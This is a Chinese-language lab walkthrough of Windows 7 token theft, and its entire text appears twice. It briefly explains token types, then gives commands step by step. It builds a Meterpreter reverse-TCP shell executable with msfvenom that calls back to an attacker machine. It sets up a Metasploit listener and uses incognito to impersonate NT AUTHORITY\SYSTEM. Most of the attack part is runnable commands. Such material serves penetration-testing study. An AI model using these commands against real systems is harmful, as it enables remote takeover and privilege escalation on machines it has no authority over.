Windows7令牌窃取
令牌(token)
访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。
复现准备
靶机:Windows7 192.168.1.15
攻击机:Kali 2021 192.168.1.16
生成反弹Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe
攻击
获取监听
msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit
打开靶机,双击生成的Shell,然后kali获取到反弹的shell
# 进入incognito
use incognito
# 列出令牌
list_tokens -u
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'
# Windows7令牌窃取
令牌(token)
访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。
复现准备
靶机:Windows7 192.168.1.15
攻击机:Kali 2021 192.168.1.16
生成反弹Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe
攻击
获取监听
msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit
打开靶机,双击生成的Shell,然后kali获取到反弹的shell
# 进入incognito
use incognito
# 列出令牌
list_tokens -u
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'